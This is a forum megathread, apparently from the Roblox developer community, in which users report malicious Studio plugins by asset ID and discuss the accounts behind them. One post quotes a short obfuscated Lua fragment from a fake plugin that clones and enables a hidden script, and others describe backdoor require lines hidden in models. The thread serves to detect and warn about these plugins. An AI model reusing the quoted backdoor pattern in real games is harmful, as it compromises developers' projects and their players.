Known Malicious Plugins for HISR detection Megathread

can someone tell me anything about poseidon ss? i have no idea where it came from and it looks sketchy.poseidon


I looked into the script of the Poseidon script and I saw some usage of profanity. If this is something we all should worry about, then this script thing could be a threat to developers. Hopefully, we wont get banned for it.


If you used the FE Gun Kit/Melee Kit theres a suspicious line in the “SimulateBulletScript”, the line is 321, with a spaced out part with a script require. I deleted this and the script GUI was removed.

This is the ID: 5770442639

And this is the account behind it all:


i didn’t use that model, I believe my gui is coming from HD Admin. my friend said he was messing around and didn’t remove it. when I have access to my computer I can attempt to find the one he used He uses a backup now

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That’s an openscript link, it opens the script. I’ve seen this in my game too, it would just send you to the script it originated from.

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HD Admin would not send you to something like that. The tool has only 1 require and that is for the MainModule. It could be likely that your using a fake HD Admin, the real one is developed by @ForeverHD.

That UI just looks bad, wonder why anyone would buy it, it’s most likely skidded as well, though, how did you get a picture of it?

False, the ID is 5712232911 as the one that you supplied requires a module that requires a module, and so on until it requires the one supplied

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I got the picture because it randomly started popping up in the game im developing. I couldn’t find anything about it in the explorer, as it only appeared in player gui when I ran the game. As of yesterday, it stopped appearing, no trace of it whatsoever. My only guess is that one of the other developers had a bad plugin.

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This is an amazing megathread, I’m almost positive that some Roblox Staff are going through the malicious plugins and Content Deleting them. Great work.

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Malicious: 5723263360
Original: Idk

Note: This plugin was made by the same person of some of the other malicious plugins on this thread.

Edit: I found this via the RoSync loader virus, for victims like me know what this is.

Malicious plugin: 5606261789
Original plugin: 4476041065

For that plugin alone, the friends of these users all look like bots. These are the only two non-bot people that are in the group that produced the malicious plugin.
Group: GizmoTjaz - Roblox --Probably trying to frame someone, actual person’s profile is here: GizmoTjaz - Roblox

DuazDaio: DuazDaio - Roblox

KaspersHub: KaspersHub - Roblox
I have a slight feeling these are stolen accounts, but I’m not sure.

Note: KaspersHub is also in a lot of other groups with similar logos.

I’m pretty sure it’s a backdoor group (and the bot accounts are possibly alts?)

Most likely, but the users I mentioned specifically have robux. I think they were stolen and then linked to all these bot accounts. Whoever did this was really good in covering their tracks. there are hundreds of bots.

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plugin checks for any and all scripts in the game and places multiple lines of requirements saying this

Malicious plugin: 6173331887
Original plugin: 866972013

I found another malicious plugin:

Real plugin (ID:6426578337) :

Fake Plugin (ID: 6427852822):

The fake plugin contains some malicious code:

workspace:WaitForChild("\0x54\0x65\0x72\0x72\0x61\0x69\0x6e"):FindFirstChild('\0x47\0x72\0x61\0x73\0x73\0x46\0x58')then a=script:WaitForChild("\0x47\0x72\0x61\0x73\0x73\0x46\0x58"):Clone()a.Parent=workspace:WaitForChild("\0x43\0x61\0x6d\0x65\0x72\0x61")a.Disabled=false;end

And also I found GrassFX script inside of the fake plugin:

And the code sample from the GrassFX script:

Thank you so much, this helped me out a LOT!

This is a virus: Smooth Cam - Roblox

the string is base64 for the into of The Prince of Belair

contains bytecode interpreters

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